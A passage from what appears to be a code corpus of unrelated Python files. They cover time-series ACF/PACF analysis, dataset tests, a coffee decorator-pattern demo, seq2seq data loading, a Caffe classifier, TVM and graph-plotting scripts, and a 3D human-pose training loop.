acf_values = sm.tsa.stattools.acf(timeseries.dropna(), nlags = seasonality * 2, fft=False, unbiased=False)
#st.write(pacf_values, lower_conf_int)
# Checking for p terms
for value in pacf_values[1:]:
if value >= upper_conf_int or value <= lower_conf_int:
p_terms += 1
else:
break
# Checking for q terms
for value in acf_values[1:]:
if value >= upper_conf_int or value <= lower_conf_int:
q_terms += 1
else:
break
# Checking for P terms
if pacf_values[seasonality] >= upper_conf_int or pacf_values[seasonality] <= lower_conf_int:
P_terms += 1
if pacf_values[seasonality*2] >= upper_conf_int or pacf_values[seasonality*2] <= lower_conf_int:
P_terms += 1
# Checking for Q terms
if acf_values[seasonality] >= upper_conf_int or acf_values[seasonality] <= lower_conf_int:
Q_terms += 1
if acf_values[seasonality*2] >= upper_conf_int or acf_values[seasonality*2] <= lower_conf_int:
Q_terms += 1
    # Plotting the ACF function
sm.graphics.tsa.plot_acf(timeseries.dropna(), lags = seasonality * 2, ax=ax1, color='green')
    # Plotting the PACF function
sm.graphics.tsa.plot_pacf(timeseries.dropna(), lags = seasonality * 2, ax=ax2, color='green')
plt.subplots_adjust(hspace=.4)
st.pyplot()
return p_terms, q_terms, P_terms, Q_terms
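# Minimal usage sketch (illustrative only, not part of the original module): for a
# monthly pandas Series ``y`` with yearly seasonality, 24 lags would be inspected.
#
#     p, q, P, Q = find_acf_pacf(y.diff(), seasonality=12)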
|
11482140
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.brambles import brambles
def test_brambles():
"""Test module brambles.py by downloading
brambles.csv and testing shape of
extracted data has 823 rows and 3 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = brambles(test_path)
try:
assert x_train.shape == (823, 3)
  except Exception:
    shutil.rmtree(test_path)
    raise
|
11482156
|
import abc
# Abstract coffee class; every coffee class must follow this structure
class CafeAbstracto(metaclass=abc.ABCMeta):
def precio(self):
pass
def ingredientes(self):
pass
# Concrete coffee type that implements the abstract class
class CafeSimple(CafeAbstracto):
def precio(self):
return 25
def ingredientes(self):
return 'Cafesito!'
# Abstract decorator class for all decorators (ingredients)
class Abstracto_Cafe_Decorator(CafeAbstracto,metaclass=abc.ABCMeta):
def __init__(self,decorated_cafe):
self.decorated_cafe = decorated_cafe
def precio(self):
return self.decorated_cafe.precio()
def ingredientes(self):
return self.decorated_cafe.ingredientes()
# Decorator (ingredient) type that implements the abstract decorator class
class Canela(Abstracto_Cafe_Decorator):
def __init__(self,decorated_cafe):
Abstracto_Cafe_Decorator.__init__(self,decorated_cafe)
def precio(self):
return self.decorated_cafe.precio() + 5
def ingredientes(self):
return self.decorated_cafe.ingredientes() + ', con canela!'
class Leche(Abstracto_Cafe_Decorator):
def __init__(self,decorated_cafe):
Abstracto_Cafe_Decorator.__init__(self,decorated_cafe)
def precio(self):
return self.decorated_cafe.precio() + 3
def ingredientes(self):
return self.decorated_cafe.ingredientes() + ', con leche!'
class Vainilla(Abstracto_Cafe_Decorator):
def __init__(self,decorated_cafe):
Abstracto_Cafe_Decorator.__init__(self,decorated_cafe)
    def precio(self):
return self.decorated_cafe.precio() + 7
def ingredientes(self):
return self.decorated_cafe.ingredientes() + ', con vainilla!'
if __name__ == "__main__":
    # No decorators here: just create the plain object and inspect its properties
cafe = CafeSimple()
print('ingredientes: '+cafe.ingredientes()+
'; A solo '+str(cafe.precio()))
cafecito =(Vainilla(CafeSimple()))
print('ingredientes: '+cafecito.ingredientes()+
'; A solo '+str(cafecito.precio())+ ' pesitos! ')
cafecito =(Leche(CafeSimple()))
print('ingredientes: '+cafecito.ingredientes()+
'; A solo '+str(cafecito.precio())+ ' pesitos! ')
cafecito =(Canela(CafeSimple()))
print('ingredientes: '+cafecito.ingredientes()+
'; A solo '+str(cafecito.precio())+ ' pesitos! ')
cafecito = Canela(Leche(CafeSimple()))
print('ingredientes: '+cafecito.ingredientes()+
'; A solo '+str(cafecito.precio())+ ' pesitos! ')
|
11482230
|
from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType
from .in_ import In
__all__ = ['Usertag', 'UsertagInterface']
# TODO: figure out how to handle reserved words
class UsertagInterface(ApiInterfaceBase):
in__: [In]
photo_of_you: bool
class Usertag(PropertyMapper, UsertagInterface):
pass
|
11482237
|
import unittest
import TestInput
import logger
from membase.api.rest_client import RestConnection
log = logger.Logger.get_logger()
class VerifyVersionTest(unittest.TestCase):
servers = None
log = None
input = TestInput.TestInput
def setUp(self):
self.log = logger.Logger.get_logger()
self.input = TestInput.TestInputSingleton.input
self.assertTrue(self.input, msg="input parameters missing...")
self.servers = self.input.servers
# read each server's version number and compare it to self.version
def test_verify_version(self):
expected_version = self.input.test_params['version']
for serverInfo in self.servers:
rest = RestConnection(serverInfo)
rest.log_client_error('test_verify_version test-method running')
version = rest.get_pools()
self.log.info('expected version on node {0} is {1}'.format(serverInfo.ip, expected_version))
self.log.info('actual version on node {0} is {1}'.format(serverInfo.ip, version.implementationVersion))
if version.implementationVersion.startswith(expected_version.lower()):
self.log.info("CORRECT VERSION INSTALLED")
else:
self.assertEqual(first=expected_version,
second=version.implementationVersion,
msg='INCORRECT VERSION INSTALLED for server @ %s' % serverInfo.ip)
|
11482259
|
import sys
from itertools import chain, combinations
import operator
import networkx as nx
def find_powerset(iterable):
"""
powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)
"""
xs = list(iterable)
# note we return an iterator rather than a list
return map(set, chain.from_iterable(combinations(xs,n) for n in range(len(xs)+1)))
def is_connected(cand_aspect): # ((node_type_1, node_type_2, edge_type), ...)
subgraph = nx.Graph()
for node_type_1, node_type_2, edge_type in cand_aspect:
subgraph.add_edge(node_type_1, node_type_2)
return nx.is_connected(subgraph)
input_file = sys.argv[1] # python calc_aspect_inconsistency.py XXX_corr.csv
atom_score_dict = {}
edge_type_set = set()
with open(input_file, "r") as f_in:
first_line_split = f_in.readline().strip().split(",")
for line in f_in:
center_node_type, other_node_i_type, other_node_j_type, edge_type_i, edge_type_j, gamma_str = line.strip().split(",")
gamma = float(gamma_str)
edge_type_set.add((center_node_type, other_node_i_type, edge_type_i))
edge_type_set.add((center_node_type, other_node_j_type, edge_type_j))
atom_score_dict[(edge_type_i, edge_type_j)] = gamma
aspect_score_dict = {}
for cand_aspect in find_powerset(edge_type_set):  # currently implemented with brute force
if len(cand_aspect) < 2:
continue
if not is_connected(cand_aspect):
continue
cur_aspect_score = 0.
for aug_edge_type_pair in combinations(cand_aspect, 2):
edge_type_pair = (aug_edge_type_pair[0][2], aug_edge_type_pair[1][2])
if edge_type_pair not in atom_score_dict:
edge_type_pair = (edge_type_pair[1], edge_type_pair[0])
if edge_type_pair not in atom_score_dict:
continue
cur_aspect_score += atom_score_dict[edge_type_pair]
aspect_score_dict[tuple(cand_aspect)] = cur_aspect_score
aspect_score_sorted_list = sorted(aspect_score_dict.items(), key=operator.itemgetter(1))
for aspect_score in aspect_score_sorted_list:
    cur_node_set = set()
    cur_edge_list = []
    for aug_edge in aspect_score[0]:
        cur_node_set.add(aug_edge[0])
        cur_node_set.add(aug_edge[1])
        cur_edge_list.append(aug_edge[2])
    print("Nodes", cur_node_set, "Edges", cur_edge_list)
    print("Inc", aspect_score[1])
|
11482263
|
from functools import partial
from typing import * # pylint: disable=W0401,W0614
import torch
class Seq2SeqDataset(torch.utils.data.Dataset):
def __init__(self, data: List[Tuple[torch.Tensor, torch.Tensor]]) -> None:
self.data = data
def __len__(self) -> int:
return len(self.data)
def __getitem__(self, index: int) -> Tuple[torch.Tensor, torch.Tensor]:
# source_seq, target_seq
example = self.data[index]
return example[0], example[1]
class Seq2SeqDataLoader(torch.utils.data.DataLoader):
def __init__(self, dataset, **kargs: Dict[str, Any]) -> None:
kargs["collate_fn"] = partial(
self.pad_collate_fn,
pad=kargs.pop("pad", 0),
batch_first=kargs.pop("batch_first", False),
sort_key=kargs.pop("sort_key", lambda x: len(x[0])),
device=kargs.pop("device", None),
)
super(Seq2SeqDataLoader, self).__init__(dataset, **kargs)
@classmethod
def pad_collate_fn(
cls,
batch: List[Tuple[torch.Tensor, torch.Tensor]],
pad: int = 0,
batch_first: bool = False,
sort_key: Optional[
Callable[[Tuple[torch.Tensor, torch.Tensor]], Any]
] = None,
device: torch.device = None,
) -> Tuple[torch.Tensor, List[int], torch.Tensor, List[int]]:
"""Creates mini-batch tensors from the list of tuples (src_seq, trg_seq).
We build a custom collate_fn rather than using default collate_fn,
because merging sequences (including padding) is not supported in default.
Seqeuences are padded to the length provided or to the maximum length
of mini-batch sequences (dynamic padding).
Args:
batch: list of tuple (src_seq, trg_seq).
- src_seq: torch tensor of shape (?); variable length.
- trg_seq: torch tensor of shape (?); variable length.
pad: value to use as padding.
batch_first: if True, then the input and output tensors are provided
as (batch_size, padded_length).
sort_key: A key to use for sorting examples in order to batch
together examples with similar lengths and minimize padding.
Returns:
src_seqs: torch tensor of shape (padded_length, batch_size).
src_lengths: list of length (batch_size); valid length for each
padded source sequence.
trg_seqs: torch tensor of shape (padded_length, batch_size).
trg_lengths: list of length (batch_size); valid length for each
padded target sequence.
"""
def merge(sequences, batch_first, pad, device):
lengths = [len(seq) for seq in sequences]
batch_size = len(sequences)
padded_length = max(lengths)
if batch_first:
padded_seqs = torch.full(
(batch_size, padded_length),
pad,
dtype=torch.long,
device=device,
)
for i, seq in enumerate(sequences):
end = lengths[i]
padded_seqs[i, :end] = seq[:end]
else:
padded_seqs = torch.full(
(padded_length, batch_size),
pad,
dtype=torch.long,
device=device,
)
for i, seq in enumerate(sequences):
end = lengths[i]
padded_seqs[:end, i] = seq[:end]
# pylint: disable=E1102
lengths = torch.tensor(lengths, dtype=torch.long, device=device)
return (padded_seqs, lengths)
# sort a list by sequence length (descending order)
# to use pack_padded_sequence
if sort_key is not None:
batch.sort(key=sort_key, reverse=True)
# seperate source and target sequences
src_seqs, trg_seqs = zip(*batch)
# merge sequences
src_seqs, src_lengths = merge(src_seqs, batch_first, pad, device)
trg_seqs, trg_lengths = merge(trg_seqs, batch_first, pad, device)
return src_seqs, src_lengths, trg_seqs, trg_lengths
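if __name__ == "__main__":
    # Minimal usage sketch (illustrative only, not part of the original module):
    # two variable-length pairs are padded into (batch, max_len) tensors.
    pairs = [
        (torch.tensor([1, 2, 3]), torch.tensor([4, 5])),
        (torch.tensor([6]), torch.tensor([7, 8, 9])),
    ]
    loader = Seq2SeqDataLoader(
        Seq2SeqDataset(pairs), batch_size=2, pad=0, batch_first=True
    )
    src, src_lengths, trg, trg_lengths = next(iter(loader))
    print(src.shape, src_lengths.tolist())  # torch.Size([2, 3]) [3, 1]
    print(trg.shape, trg_lengths.tolist())  # torch.Size([2, 3]) [2, 3]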
|
11482298
|
import caffe
import cv2
import sys
import matplotlib.pyplot as plt
#import Image
def deploy(img_path):
caffe.set_mode_gpu()
MODEL_JOB_DIR = '/dli/data/digits/20180301-185638-e918'
DATASET_JOB_DIR = '/dli/data/digits/20180222-165843-ada0'
ARCHITECTURE = MODEL_JOB_DIR + '/deploy.prototxt'
WEIGHTS = MODEL_JOB_DIR + '/snapshot_iter_735.caffemodel'
# Initialize the Caffe model using the model trained in DIGITS.
net = caffe.Classifier(ARCHITECTURE, WEIGHTS,
channel_swap=(2,1,0),
raw_scale=255,
image_dims=(256, 256))
# Create an input that the network expects.
input_image= caffe.io.load_image(img_path)
test_image = cv2.resize(input_image, (256,256))
mean_image = caffe.io.load_image(DATASET_JOB_DIR + '/mean.jpg')
test_image = test_image-mean_image
prediction = net.predict([test_image])
#print("Input Image:")
#plt.imshow(sys.argv[1])
#plt.show()
#Image.open(input_image).show()
print(prediction)
##Create a useful output
print("Output:")
    if prediction.argmax() == 0:
        print("Sorry cat:( https://media.giphy.com/media/jb8aFEQk3tADS/giphy.gif")
    else:
        print("Welcome dog! https://www.flickr.com/photos/aidras/5379402670")
##Ignore this part
if __name__ == '__main__':
print(deploy(sys.argv[1]))
|
11482300
|
from importlib import reload
import sastvd.helpers.dclass as svddc
import sastvd.helpers.joern as svdj
import sastvd.linevd as lvd
from graphviz import Digraph
reload(svdj)
def get_digraph(nodes, edges, edge_label=True):
"""Plote digraph given nodes and edges list."""
dot = Digraph(comment="Combined PDG", engine="neato")
nodes = [n + [svdj.nodelabel2line(n[1])] for n in nodes]
colormap = {"": "white"}
for n in nodes:
if n[2] not in colormap:
colormap[n[2]] = svdj.randcolor()
for n in nodes:
style = {"shape": "circle", "fixedsize": "true", "width": "0.5"}
dot.node(str(n[0]), str(n[1]), **style)
for e in edges:
style = {"color": "black"}
if e[2] == "CALL":
style["style"] = "solid"
style["color"] = "purple"
elif e[2] == "AST":
style["style"] = "solid"
style["color"] = "black"
elif e[2] == "CFG":
style["style"] = "solid"
style["color"] = "red"
elif e[2] == "CDG":
style["style"] = "solid"
style["color"] = "black"
elif e[2] == "REACHING_DEF":
style["style"] = "dashed"
style["color"] = "black"
elif "DDG" in e[2]:
style["style"] = "dashed"
style["color"] = "red"
# style["dir"] = "back"
else:
style["style"] = "solid"
style["color"] = "black"
style["penwidth"] = "1"
if edge_label:
dot.edge(str(e[0]), str(e[1]), e[2], **style)
else:
dot.edge(str(e[0]), str(e[1]), **style)
return dot
_id = svddc.BigVulDataset.itempath(182352)
lineMap = {
1: 1,
2: 2,
3: 3,
4: 4,
5: 5,
6: 6,
7: 7,
8: 8,
9: 9,
12: 11,
13: 12,
14: 13,
16: 14,
17: 15,
21: 18,
22: 19,
25: 21,
26: 22,
29: 25,
31: 27,
33: 28,
34: 29,
35: 30,
36: 31,
}
# Get CPG
n, e = svdj.get_node_edges(_id)
n.lineNumber = n.lineNumber.map(lineMap).fillna("")
e.line_in = e.line_in.map(lineMap).fillna("")
e.line_out = e.line_out.map(lineMap).fillna("")
# Swap line numbers
e["tmp1"] = e.line_in
e["tmp2"] = e.line_out
e.line_out = e.tmp1
e.line_in = e.tmp2
# Group nodes
n, e = lvd.ne_groupnodes(n, e)
# Reverse DDG edges for method declaration
alt_e = e[(e.line_out == 1) & (e.dataflow != "")].copy()
alt_e.outnode = alt_e.innode
alt_e.innode = 1
e = e[e.line_out != 1]
e = e.append(alt_e)
# Plot graph
n["node_label"] = n["lineNumber"].astype(str)
e = e[e.innode != e.outnode]
e.etype = e.apply(
lambda x: f"DDG: {x.dataflow}" if len(x.dataflow) > 0 else x.etype, axis=1
)
e[e.dataflow == "!sig_none"]
en = e[e.etype != "CFG"]
en = en[en.etype != "AST"]
en = en[en.etype != "REACHING_DEF"]
en = en[en.etype != "DDG: <RET>"]
en = en[en.etype != "DDG: !sig_none"]
en = en[en.etype != "DDG: now = timespec64_to_ktime(ts64)"]
en = en.merge(n[["id", "name", "code"]], left_on="line_in", right_on="id")
# en = en[~((en.etype.str.contains("=")) & (~en.name.str.contains("assignment")))]
# Only keep assignment DDG
en.name = en.name.fillna("<operator>.assignment")
en = en[en.name == "<operator>.assignment"]
en.dataflow = en.dataflow.fillna("")
en["left_assign"] = en.code.apply(lambda x: x.split("=")[0].strip())
en = en[en.apply(lambda x: x.left_assign in x.dataflow, axis=1)]
# Add CDG edges back
en = en[(en.etype.str.contains("DDG"))]
en = en.append(e[e.etype == "CDG"])
# Add other edges
en = en.append({"innode": 3, "outnode": 18, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 3, "outnode": 22, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 3, "outnode": 25, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 4, "outnode": 9, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 4, "outnode": 19, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 4, "outnode": 25, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 5, "outnode": 18, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 5, "outnode": 19, "etype": "DDG"}, ignore_index=1)
en = en.append({"innode": 6, "outnode": 8, "etype": "DDG"}, ignore_index=1)
# Reverse edges back
en["tmp"] = en.innode
en["innode"] = en.outnode
en["outnode"] = en.tmp
n = svdj.drop_lone_nodes(n, en)
n = n.append({"id": 4, "node_label": "4"}, ignore_index=1)
dot = get_digraph(
n[["id", "node_label"]].to_numpy().tolist(),
en[["outnode", "innode", "etype"]].to_numpy().tolist(),
edge_label=False,
)
dot.render("/tmp/tmp.gv", view=True)
|
11482363
|
import itertools
import numpy as np
import scipy.sparse as sp
import tvm
from tvm.ir import IRModule
from tvm import relay
from tvm.relay.data_dep_optimization import simplify_fc_transpose
def run_func(func, params, x):
with tvm.transform.PassContext(opt_level=3):
lib = relay.build(func, "llvm", params=params)
from tvm.contrib import graph_runtime
ctx = tvm.cpu(0)
dtype = "float32"
m = graph_runtime.GraphModule(lib["default"](ctx))
# set inputs
m.set_input("data", tvm.nd.array(x.astype(dtype)))
# execute
m.run()
# get outputs
tvm_output = m.get_output(0)
return tvm_output.asnumpy()
def test_simplify_fc_transpose():
data = relay.var("data", shape=(1, 32), dtype="float32")
x = relay.nn.relu(data)
w1 = relay.var("w1", shape=(32, 64), dtype="float32")
y = relay.nn.dense(x, relay.transpose(w1, axes=[1, 0]))
z = relay.nn.relu(y)
w2 = relay.var("w2", shape=(64, 16), dtype="float32")
zz = relay.nn.dense(z, relay.transpose(w2, axes=[1, 0]))
func = relay.Function(relay.analysis.free_vars(zz), zz)
params = {
"w1": tvm.nd.array(np.random.uniform(-1, 1, (32, 64)).astype("float32")),
"w2": tvm.nd.array(np.random.uniform(-1, 1, (64, 16)).astype("float32")),
}
x_np = np.random.randn(1, 32).astype("float32")
old_result = run_func(func, params, x_np)
new_func, new_params = simplify_fc_transpose.convert(func, params)
new_result = run_func(new_func, new_params, x_np)
np.testing.assert_allclose(old_result, new_result, atol=1e-5, rtol=1e-5)
|
11482377
|
from tracardi.process_engine.tql.domain.operations import OrOperation, AndOperation
class Values:
def __init__(self):
self.values = []
def append_or_value(self, value):
if isinstance(value, OrOperation):
self.values = self.values + value['bool']['should']
else:
self.values.append(value)
def append_and_value(self, value):
if isinstance(value, AndOperation):
self.values = self.values + value['bool']['must']
else:
self.values.append(value)
|
11482382
|
import os
import torch
import shutil
import numpy as np
from lib.loss.loss import mpjpe, n_mpjpe, p_mpjpe, mean_velocity_error, weighted_mpjpe
from lib.dataloader.generators import UnchunkedGenerator
from lib.camera.camera import image_coordinates
from lib.skeleton.bone import get_bone_length_from_3d_pose, get_bone_unit_vector_from_3d_pose
class Trainer():
def __init__(self,
data_config, model_config, train_config, plot_config,
train_generator, test_generator,
models, optimizer,
kps_left, kps_right, joints_left, joints_right, plotter, best_performance=None):
self.data_config = data_config
self.model_config = model_config
self.train_config = train_config
self.plot_config = plot_config
self.lr = train_config['LEARNING_RATE']
self.optimizer = optimizer
self.train_generator = train_generator
self.test_generator = test_generator
self.pos_model_train = models['train_pos']
self.pos_model_test = models['test_pos']
self.trj_model_train = models['train_trj']
self.trj_model_test = models['test_trj']
self.min_loss = 1e5 if best_performance is None else best_performance
self.losses_3d_train = []
self.losses_3d_valid = []
self.kps_left = kps_left
self.kps_right = kps_right
self.joints_left = joints_left
self.joints_right = joints_right
self.receptive_field = model_config['NUM_FRAMES']
self.plotter = plotter
@staticmethod
def eval_data_prepare(receptive_field, inputs_2d, inputs_3d):
inputs_2d_p = torch.squeeze(inputs_2d)
if inputs_3d is not None:
inputs_3d_p = inputs_3d.permute(1, 0, 2, 3)
else:
inputs_3d_p = inputs_3d
out_num = inputs_2d_p.shape[0] - receptive_field + 1
eval_input_2d = torch.empty(out_num, receptive_field, inputs_2d_p.shape[1], inputs_2d_p.shape[2])
for i in range(out_num):
eval_input_2d[i, :, :, :] = inputs_2d_p[i:i + receptive_field, :, :]
return eval_input_2d, inputs_3d_p
def train(self, epoch, mlog):
N = 0
epoch_loss_3d_train = 0
epoch_loss_3d_pos = 0
epoch_loss_3d_trj = 0
epoch_loss_3d_bone = 0
self.pos_model_train.train()
if self.model_config['TRAJECTORY_MODEL']:
self.trj_model_train.train()
iter = 0
for cam, batch_3d, batch_2d in self.train_generator.next_epoch():
inputs_2d = torch.from_numpy(batch_2d.astype('float32'))
inputs_3d = torch.from_numpy(batch_3d.astype('float32'))
inputs_param = torch.from_numpy(cam.astype('float32'))
if torch.cuda.is_available():
inputs_2d = inputs_2d.cuda()
inputs_3d = inputs_3d.cuda()
inputs_param = inputs_param.cuda()
if self.model_config['TRAJECTORY_MODEL']:
inputs_traj = inputs_3d[:, :, :1].clone()
if self.data_config['RAY_ENCODING']:
# do nothing
if self.model_config['TRAJECTORY_MODEL']:
inputs_3d[:, :, 1:] -= inputs_3d[:, :, 0:1]
inputs_3d[:, :, 0] = 0
else:
inputs_3d[:, :, 1:] -= inputs_3d[:, :, 0:1]
inputs_3d[:, :, 0] = 0
self.optimizer.zero_grad()
# Predict 3D poses
predicted_3d_pos = self.pos_model_train(inputs_2d, inputs_param)
loss_3d_pos = mpjpe(predicted_3d_pos, inputs_3d)
epoch_loss_3d_train += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_pos.item()
epoch_loss_3d_pos += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_pos.item()
N += inputs_3d.shape[0] * inputs_3d.shape[1]
total_loss = loss_3d_pos
if self.model_config['BONE_COMPARISON']:
predicted_bone_length = get_bone_length_from_3d_pose(predicted_3d_pos)
target_bone_length = get_bone_length_from_3d_pose(inputs_3d)
loss_3d_bone_length = mpjpe(predicted_bone_length, target_bone_length)
predicted_bone_unit_vector = get_bone_unit_vector_from_3d_pose(predicted_3d_pos)
target_bone_unit_vector = get_bone_unit_vector_from_3d_pose(inputs_3d)
loss_3d_bone_angle = mpjpe(predicted_bone_unit_vector, target_bone_unit_vector)
epoch_loss_3d_bone += inputs_3d.shape[0] * inputs_3d.shape[1] * (loss_3d_bone_length.item() + loss_3d_bone_angle.item())
total_loss += (loss_3d_bone_length + loss_3d_bone_angle)
if self.model_config['TRAJECTORY_MODEL']:
predicted_3d_trj = self.trj_model_train(inputs_2d, inputs_param)
w = torch.abs(1 / inputs_traj[:, :, :, 2]) # Weight inversely proportional to depth
loss_3d_traj = weighted_mpjpe(predicted_3d_trj, inputs_traj, w)
assert inputs_traj.shape[0] * inputs_traj.shape[1] == inputs_3d.shape[0] * inputs_3d.shape[1]
epoch_loss_3d_train += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_traj.item()
epoch_loss_3d_trj += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_traj.item()
total_loss += loss_3d_traj
# ---------------- visualization ---------------- #
if iter % 2048 == 0 and self.plotter is not None and epoch % 64 == 0:
self.plotter.show_plot(
epoch, inputs_2d.detach().cpu().numpy(),
inputs_3d.detach().cpu().numpy(),
predicted_3d_pos.detach().cpu().numpy(),
dataset=self.data_config['DATASET'],
gt=self.data_config['KEYPOINTS']
)
# ---------------- visualization ---------------- #
iter += 1
total_loss.backward()
self.optimizer.step()
self.losses_3d_train.append(epoch_loss_3d_train / N)
torch.cuda.empty_cache()
if self.plotter:
# plot all the losses
self.plotter.log_metric('train', self.losses_3d_train[-1] * 1000, epoch)
self.plotter.log_metric('train_pos', epoch_loss_3d_pos / N * 1000, epoch)
self.plotter.log_metric('train_trj', epoch_loss_3d_trj / N * 1000, epoch)
self.plotter.log_metric('train_bone', epoch_loss_3d_bone / N * 1000, epoch)
# plot all the learning rates
self.plotter.log_metric('lr', self.lr, epoch)
        # return the current epoch's mpjpe and the current learning rate
return self.losses_3d_train[-1], self.lr
def test(self, epoch, mlog):
with torch.no_grad():
self.pos_model_test.load_state_dict(self.pos_model_train.state_dict(), strict=True)
self.pos_model_test.eval()
if self.model_config['TRAJECTORY_MODEL']:
self.trj_model_test.load_state_dict(self.trj_model_train.state_dict(), strict=True)
self.trj_model_test.eval()
epoch_loss_3d_valid = 0
epoch_loss_3d_pos = 0
epoch_loss_3d_trj = 0
epoch_loss_3d_bone = 0
N = 0
# Evaluate on test set
for cam, batch, batch_2d in self.test_generator.next_epoch():
cam_param = np.array([[(-c.Rw2c.T @ c.Tw2c)[2][0], c.cam_pitch_rad] for c in cam]).astype('float32')
inputs_2d = torch.from_numpy(batch_2d.astype('float32'))
inputs_3d = torch.from_numpy(batch.astype('float32'))
##### convert size
inputs_2d, inputs_3d = self.eval_data_prepare(self.receptive_field, inputs_2d, inputs_3d)
inputs_param = torch.from_numpy(cam_param)
if torch.cuda.is_available():
inputs_2d = inputs_2d.cuda()
inputs_3d = inputs_3d.cuda()
inputs_param = inputs_param.cuda()
if self.model_config['TRAJECTORY_MODEL']:
inputs_traj = inputs_3d.clone()
if self.data_config['RAY_ENCODING']:
                    # with ray encoding, convert joints to root-relative form only when a
                    # separate trajectory model predicts the root; otherwise keep the
                    # absolute positions
if self.model_config['TRAJECTORY_MODEL']:
inputs_3d[:, :, 1:] -= inputs_3d[:, :, 0:1]
inputs_3d[:, :, 0] = 0
else:
inputs_3d[:, :, 1:] -= inputs_3d[:, :, 0:1]
inputs_3d[:, :, 0] = 0
predicted_3d_pos = self.pos_model_test(inputs_2d, inputs_param)
epoch_loss_3d_pos += inputs_3d.shape[0] * inputs_3d.shape[1] * mpjpe(predicted_3d_pos, inputs_3d).item()
if self.model_config['BONE_COMPARISON']:
predicted_bone_length = get_bone_length_from_3d_pose(predicted_3d_pos)
target_bone_length = get_bone_length_from_3d_pose(inputs_3d)
loss_3d_bone_length = mpjpe(predicted_bone_length, target_bone_length)
predicted_bone_unit_vector = get_bone_unit_vector_from_3d_pose(predicted_3d_pos)
target_bone_unit_vector = get_bone_unit_vector_from_3d_pose(inputs_3d)
loss_3d_bone_angle = mpjpe(predicted_bone_unit_vector, target_bone_unit_vector)
epoch_loss_3d_bone += inputs_3d.shape[0] * inputs_3d.shape[1] * (loss_3d_bone_length.item() + loss_3d_bone_angle.item())
if self.model_config['TRAJECTORY_MODEL']:
predicted_3d_trj = self.trj_model_test(inputs_2d, inputs_param)
predicted_3d_pos += predicted_3d_trj
loss_3d_pos = mpjpe(predicted_3d_pos, inputs_traj)
w = torch.abs(1 / inputs_traj[:, :, 0, 2])
epoch_loss_3d_trj += inputs_3d.shape[0] * inputs_3d.shape[1] * weighted_mpjpe(predicted_3d_trj, inputs_traj[:, :, 0:1], w).item()
else:
loss_3d_pos = mpjpe(predicted_3d_pos, inputs_3d)
epoch_loss_3d_valid += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_pos.item()
N += inputs_3d.shape[0] * inputs_3d.shape[1]
self.losses_3d_valid.append(epoch_loss_3d_valid / N)
# Save checkpoint if necessary
if epoch % self.train_config['CHECKPOINT_FREQUENCY'] == 0:
chk_path = os.path.join(self.train_config['CHECKPOINT'], 'epoch_{}.bin'.format(epoch))
                mlog.info('Saving epoch {}\'s checkpoint to {}.'.format(epoch, chk_path))
if self.model_config['TRAJECTORY_MODEL']:
torch.save({
'epoch': epoch,
'lr': self.lr,
'best_performance': self.losses_3d_valid[-1] * 1000 if self.losses_3d_valid[-1] * 1000 < self.min_loss else self.min_loss,
'random_state': self.train_generator.random_state(),
'optimizer': self.optimizer.state_dict(),
'model_pos': self.pos_model_train.state_dict(),
'model_trj': self.trj_model_train.state_dict()
}, chk_path)
else:
torch.save({
'epoch': epoch,
'lr': self.lr,
'best_performance': self.losses_3d_valid[-1] * 1000 if self.losses_3d_valid[-1] * 1000 < self.min_loss else self.min_loss,
'random_state': self.train_generator.random_state(),
'optimizer': self.optimizer.state_dict(),
'model_pos': self.pos_model_train.state_dict(),
}, chk_path)
#### save best checkpoint
                best_chk_path = os.path.join(self.train_config['CHECKPOINT'], 'best_epoch.bin')
if self.losses_3d_valid[-1] * 1000 < self.min_loss:
self.min_loss = self.losses_3d_valid[-1] * 1000
mlog.info('Saving best checkpoint to {} with mpjpe: {}.'.format(best_chk_path, self.min_loss))
shutil.copy(chk_path, best_chk_path)
cmd = 'rm {}'.format(chk_path)
os.system(cmd)
# Decay learning rate exponentially
self.lr *= self.train_config['LR_DECAY']
for param_group in self.optimizer.param_groups:
param_group['lr'] *= self.train_config['LR_DECAY']
# Decay BatchNorm momentum
if self.model_config['MODEL'] == 'VideoPose3D':
momentum = self.train_config['INITIAL_MOMENTUM'] * np.exp(-(epoch-1) / self.train_config['EPOCHS'] * np.log(self.train_config['INITIAL_MOMENTUM'] / self.train_config['FINAL_MOMENTUM']))
self.pos_model_train.module.set_bn_momentum(momentum)
if self.model_config['TRAJECTORY_MODEL']:
self.trj_model_train.module.set_bn_momentum(momentum)
if self.plotter:
# plot all the losses
self.plotter.log_metric('test', self.losses_3d_valid[-1] * 1000, epoch)
self.plotter.log_metric('test_pos', epoch_loss_3d_pos / N * 1000, epoch)
self.plotter.log_metric('test_trj', epoch_loss_3d_trj / N * 1000, epoch)
self.plotter.log_metric('test_bone', epoch_loss_3d_bone / N * 1000, epoch)
            # return the current epoch's mpjpe
return self.losses_3d_valid[-1]
def evaluate_core(self, test_generator, action=None, return_predictions=False, flip_test=False):
epoch_loss_3d_pos = 0
epoch_loss_3d_pos_procrustes = 0
epoch_loss_3d_pos_scale = 0
epoch_loss_3d_vel = 0
epoch_loss_3d_root = 0
with torch.no_grad():
self.pos_model_test.eval()
if self.model_config['TRAJECTORY_MODEL']:
self.trj_model_test.eval()
N = 0
for cam, batch, batch_2d in test_generator.next_epoch():
cam_param = np.array([(-cam.Rw2c.T @ cam.Tw2c)[2][0], cam.cam_pitch_rad]).astype('float32')
inputs_2d = torch.from_numpy(batch_2d.astype('float32'))
if flip_test:
inputs_2d_flip = inputs_2d.clone()
inputs_2d_flip[:, :, :, 0] *= -1
inputs_2d_flip[:, :, self.kps_left + self.kps_right, :] = inputs_2d_flip[:, :, self.kps_right + self.kps_left, :]
if return_predictions:
